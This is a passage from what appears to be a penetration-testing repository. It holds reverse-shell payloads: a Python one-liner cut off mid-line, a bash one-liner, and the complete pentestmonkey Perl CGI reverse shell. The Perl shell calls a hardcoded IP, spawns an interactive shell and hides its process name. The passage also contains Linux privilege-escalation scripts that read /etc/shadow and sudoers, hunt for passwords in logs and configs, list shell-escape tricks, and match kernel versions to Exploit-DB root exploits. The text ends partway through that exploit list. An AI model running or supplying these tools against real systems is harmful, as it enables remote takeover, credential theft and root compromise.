",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4 |
--------------------------------------------------------------------------------
/payloads/one-liners/reverse_shell.sh:
--------------------------------------------------------------------------------
1 | # Reverse shell one-liner bash (debian-based)
2 |
3 | #!/bin/bash
4 |
5 | bash -i &0 2>&0
6 | # stdin vindo da conexão interpretado pela bash com stdout e stderr retornado de volta pra conexão (socket tcp)
7 |
8 | # ou.... sh -i 1>&/dev/tcp/127.0.0.1/8080 0<&1
9 | # só funciona em alguns sistemas...
10 |
--------------------------------------------------------------------------------
/payloads/reverse_shell.cgi:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl -w
2 | # perl-reverse-shell - A Reverse Shell implementation in PERL
3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net
4 | #
5 | # This tool may be used for legal purposes only. Users take full responsibility
6 | # for any actions performed using this tool. The author accepts no liability
7 | # for damage caused by this tool. If these terms are not acceptable to you, then
8 | # do not use this tool.
9 | #
10 | # In all other respects the GPL version 2 applies:
11 | #
12 | # This program is free software; you can redistribute it and/or modify
13 | # it under the terms of the GNU General Public License version 2 as
14 | # published by the Free Software Foundation.
15 | #
16 | # This program is distributed in the hope that it will be useful,
17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
19 | # GNU General Public License for more details.
20 | #
21 | # You should have received a copy of the GNU General Public License along
22 | # with this program; if not, write to the Free Software Foundation, Inc.,
23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
24 | #
25 | # This tool may be used for legal purposes only. Users take full responsibility
26 | # for any actions performed using this tool. If these terms are not acceptable to
27 | # you, then do not use this tool.
28 | #
29 | # You are encouraged to send comments, improvements or suggestions to
30 | # me at pentestmonkey@pentestmonkey.net
31 | #
32 | # Description
33 | # -----------
34 | # This script will make an outbound TCP connection to a hardcoded IP and port.
35 | # The recipient will be given a shell running as the current user (apache normally).
36 | #
37 |
38 | use strict;
39 | use Socket;
40 | use FileHandle;
41 | use POSIX;
42 | my $VERSION = "1.0";
43 |
44 | # Where to send the reverse shell. Change these.
45 | my $ip = '10.11.0.44';
46 | my $port = 1234;
47 |
48 | # Options
49 | my $daemon = 1;
50 | my $auth = 0; # 0 means authentication is disabled and any
51 | # source IP can access the reverse shell
52 | my $authorised_client_pattern = qr(^127\.0\.0\.1$);
53 |
54 | # Declarations
55 | my $global_page = "";
56 | my $fake_process_name = "/usr/sbin/apache";
57 |
58 | # Change the process name to be less conspicious
59 | $0 = "[httpd]";
60 |
61 | # Authenticate based on source IP address if required
62 | if (defined($ENV{'REMOTE_ADDR'})) {
63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
64 |
65 | if ($auth) {
66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
67 | cgiprint("ERROR: Your client isn't authorised to view this page");
68 | cgiexit();
69 | }
70 | }
71 | } elsif ($auth) {
72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
73 | cgiexit(0);
74 | }
75 |
76 | # Background and dissociate from parent process if required
77 | if ($daemon) {
78 | my $pid = fork();
79 | if ($pid) {
80 | cgiexit(0); # parent exits
81 | }
82 |
83 | setsid();
84 | chdir('/');
85 | umask(0);
86 | }
87 |
88 | # Make TCP connection for reverse shell
89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
91 | cgiprint("Sent reverse shell to $ip:$port");
92 | cgiprintpage();
93 | } else {
94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!");
95 | cgiexit();
96 | }
97 |
98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection
99 | open(STDIN, ">&SOCK");
100 | open(STDOUT,">&SOCK");
101 | open(STDERR,">&SOCK");
102 | $ENV{'HISTFILE'} = '/dev/null';
103 | system("w;uname -a;id;pwd");
104 | exec({"/bin/sh"} ($fake_process_name, "-i"));
105 |
106 | # Wrapper around print
107 | sub cgiprint {
108 | my $line = shift;
109 | $line .= "\n";
110 | $global_page .= $line;
111 | }
112 |
113 | # Wrapper around exit
114 | sub cgiexit {
115 | cgiprintpage();
116 | exit 0; # 0 to ensure we don't give a 500 response.
117 | }
118 |
119 | # Form HTTP response using all the messages gathered by cgiprint so far
120 | sub cgiprintpage {
121 | print "Content-Length: " . length($global_page) . "\r
122 | Connection: close\r
123 | Content-Type: text\/html\r\n\r\n" . $global_page;
124 | }
125 |
--------------------------------------------------------------------------------
/priv_escalation/Linux/README.md:
--------------------------------------------------------------------------------
1 | ## Links to check
2 |
3 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
4 |
--------------------------------------------------------------------------------
/priv_escalation/Linux/escalation_gathering.sh:
--------------------------------------------------------------------------------
1 | #Script to gathering information in a privilege escalation
2 |
3 | #!/bin/sh
4 | echo Distribution and kernel version
5 | cat /etc/issue
6 | uname -a
7 |
8 | echo Mounted filesystems
9 | mount -l
10 |
11 | echo Network configuration
12 | ifconfig -a
13 | cat /etc/hosts
14 | arp
15 |
16 | echo Development tools availability
17 | which gcc
18 | which g++
19 | which python
20 |
21 | echo Installed packages (Ubuntu)
22 | dpkg -l
23 |
24 | echo Services
25 | netstat -tulnpe
26 |
27 | echo Processes
28 | ps -aux
29 |
30 | echo Scheduled jobs
31 | find /etc/cron* -ls 2>/dev/null
32 | find /var/spool/cron* -ls 2>/dev/null
33 |
34 | echo Readable files in /etc
35 | find /etc -user `id -u` -perm -u=r \
36 | -o -group `id -g` -perm -g=r \
37 | -o -perm -o=r \
38 | -ls 2>/dev/null
39 |
40 | echo SUID and GUID writable files
41 | find / -o -group `id -g` -perm -g=w -perm -u=s \
42 | -o -perm -o=w -perm -u=s \
43 | -o -perm -o=w -perm -g=s \
44 | -ls 2>/dev/null
45 |
46 | echo SUID and GUID files
47 | find / -type f -perm -u=s -o -type f -perm -g=s \
48 | -ls 2>/dev/null
49 |
50 | echo Writable files outside HOME
51 | mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w -o -group `id -g` -perm -g=w -o -perm -o=w \) -ls 2>/dev/null
52 |
--------------------------------------------------------------------------------
/priv_escalation/Linux/linuxprivchecker.py:
--------------------------------------------------------------------------------
1 | #!/usr/env python
2 |
3 | ###############################################################################################################
4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
6 | ##-------------------------------------------------------------------------------------------------------------
7 | ## [Details]:
8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and
9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
10 | ## passwords and applicable exploits.
11 | ##-------------------------------------------------------------------------------------------------------------
12 | ## [Warning]:
13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
15 | ## results. For example, the function that links packages to running processes is based on keywords and will
16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
17 | ## Feel free to change or improve it any way you see fit.
18 | ##-------------------------------------------------------------------------------------------------------------
19 | ## [Modification, Distribution, and Attribution]:
20 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
21 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
22 | ## worth anything anyway :)
23 | ###############################################################################################################
24 |
25 | # conditional import for older versions of python not compatible with subprocess
26 | try:
27 | import subprocess as sub
28 | compatmode = 0 # newer version of python, no need for compatibility mode
29 | except ImportError:
30 | import os # older version of python, need to use os instead
31 | compatmode = 1
32 |
33 | # title / formatting
34 | bigline = "================================================================================================="
35 | smlline = "-------------------------------------------------------------------------------------------------"
36 |
37 | print bigline
38 | print "LINUX PRIVILEGE ESCALATION CHECKER"
39 | print bigline
40 | print
41 |
42 | # loop through dictionary, execute the commands, store the results, return updated dict
43 | def execCmd(cmdDict):
44 | for item in cmdDict:
45 | cmd = cmdDict[item]["cmd"]
46 | if compatmode == 0: # newer version of python, use preferred subprocess
47 | out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
48 | results = out.split('\n')
49 | else: # older version of python, use os.popen
50 | echo_stdout = os.popen(cmd, 'r')
51 | results = echo_stdout.read().split('\n')
52 | cmdDict[item]["results"]=results
53 | return cmdDict
54 |
55 | # print results for each previously executed command, no return value
56 | def printResults(cmdDict):
57 | for item in cmdDict:
58 | msg = cmdDict[item]["msg"]
59 | results = cmdDict[item]["results"]
60 | print "[+] " + msg
61 | for result in results:
62 | if result.strip() != "":
63 | print " " + result.strip()
64 | print
65 | return
66 |
67 | def writeResults(msg, results):
68 | f = open("privcheckout.txt", "a");
69 | f.write("[+] " + str(len(results)-1) + " " + msg)
70 | for result in results:
71 | if result.strip() != "":
72 | f.write(" " + result.strip())
73 | f.close()
74 | return
75 |
76 | # Basic system info
77 | print "[*] GETTING BASIC SYSTEM INFO...\n"
78 |
79 | results=[]
80 |
81 | sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
82 | "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
83 | "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
84 | }
85 |
86 | sysInfo = execCmd(sysInfo)
87 | printResults(sysInfo)
88 |
89 | # Networking Info
90 |
91 | print "[*] GETTING NETWORKING INFO...\n"
92 |
93 | netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
94 | "ROUTE":{"cmd":"route", "msg":"Route", "results":results},
95 | "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
96 | }
97 |
98 | netInfo = execCmd(netInfo)
99 | printResults(netInfo)
100 |
101 | # File System Info
102 | print "[*] GETTING FILESYSTEM INFO...\n"
103 |
104 | driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
105 | "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
106 | }
107 |
108 | driveInfo = execCmd(driveInfo)
109 | printResults(driveInfo)
110 |
111 | # Scheduled Cron Jobs
112 | cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
113 | "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
114 | }
115 |
116 | cronInfo = execCmd(cronInfo)
117 | printResults(cronInfo)
118 |
119 | # User Info
120 | print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
121 |
122 | userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
123 | "ID":{"cmd":"id","msg":"Current User ID", "results":results},
124 | "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
125 | "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
126 | "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
127 | "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
128 | "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
129 | "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
130 | }
131 |
132 | userInfo = execCmd(userInfo)
133 | printResults(userInfo)
134 |
135 | if "root" in userInfo["ID"]["results"][0]:
136 | print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
137 |
138 | # File/Directory Privs
139 | print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
140 |
141 | fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
142 | "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
143 | "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
144 | "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
145 | "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
146 | }
147 |
148 | fdPerms = execCmd(fdPerms)
149 | printResults(fdPerms)
150 |
151 | pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
152 | "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
153 | "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
154 | }
155 |
156 | pwdFiles = execCmd(pwdFiles)
157 | printResults(pwdFiles)
158 |
159 | # Processes and Applications
160 | print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
161 |
162 | if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
163 | getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
164 | else:
165 | getPkgs = "rpm -qa | sort -u" # RH/other
166 |
167 | getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
168 | "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
169 | }
170 |
171 | getAppProc = execCmd(getAppProc)
172 | printResults(getAppProc) # comment to reduce output
173 |
174 | otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
175 | "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
176 | "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
177 | }
178 |
179 | otherApps = execCmd(otherApps)
180 | printResults(otherApps)
181 |
182 | print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
183 |
184 | # find the package information for the processes currently running
185 | # under root or another super user
186 |
187 | procs = getAppProc["PROCS"]["results"]
188 | pkgs = getAppProc["PKGS"]["results"]
189 | supusers = userInfo["SUPUSERS"]["results"]
190 | procdict = {} # dictionary to hold the processes running as super users
191 |
192 | for proc in procs: # loop through each process
193 | relatedpkgs = [] # list to hold the packages related to a process
194 | try:
195 | for user in supusers: # loop through the known super users
196 | if (user != "") and (user in proc): # if the process is being run by a super user
197 | procname = proc.split(" ")[4] # grab the process name
198 | if "/" in procname:
199 | splitname = procname.split("/")
200 | procname = splitname[len(splitname)-1]
201 | for pkg in pkgs: # loop through the packages
202 | if not len(procname) < 3: # name too short to get reliable package results
203 | if procname in pkg:
204 | if procname in procdict:
205 | relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
206 | if pkg not in relatedpkgs:
207 | relatedpkgs.append(pkg) # add pkg to the list
208 | procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
209 | except:
210 | pass
211 |
212 | for key in procdict:
213 | print " " + key # print the process name
214 | try:
215 | if not procdict[key][0] == "": # only print the rest if related packages were found
216 | print " Possible Related Packages: "
217 | for entry in procdict[key]:
218 | print " " + entry # print each related package
219 | except:
220 | pass
221 |
222 | # EXPLOIT ENUMERATION
223 |
224 | # First discover the avaialable tools
225 | print
226 | print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
227 |
228 | devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
229 | devTools = execCmd(devTools)
230 | printResults(devTools)
231 |
232 | print "[+] Related Shell Escape Sequences...\n"
233 | escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
234 | for cmd in escapeCmd:
235 | for result in devTools["TOOLS"]["results"]:
236 | if cmd in result:
237 | for item in escapeCmd[cmd]:
238 | print " " + cmd + "-->\t" + item
239 | print
240 | print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
241 |
242 | # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
243 | # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
244 | sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
245 | "< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
246 | "2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
247 | "<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
248 | "2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
249 | "<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
250 | "2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
251 | "2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
252 | "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
253 | "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
254 | "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
255 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
256 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
257 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
258 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
259 | "<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
260 | "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
261 | "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
262 | "Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
263 | "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
264 | "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
265 | "2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
266 | "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
267 | "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
268 | "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
269 | "2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
270 | "2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
271 | "2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
272 | "2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
273 | "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
274 | "Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
275 | "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
276 | "2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
277 | "2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
278 | "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
279 | "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
280 | "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
281 | "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
282 | "< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
283 | "2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
284 | "2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
285 | "2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
286 | "'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
287 | "2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
288 | "Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
289 | "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
290 | "Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
291 | "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
292 | "Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
293 | "Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
294 | "<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
295 | "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
296 | "CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
297 | "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
298 | "< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
299 | "Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
300 | "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
301 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
302 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
303 | "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
304 | "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
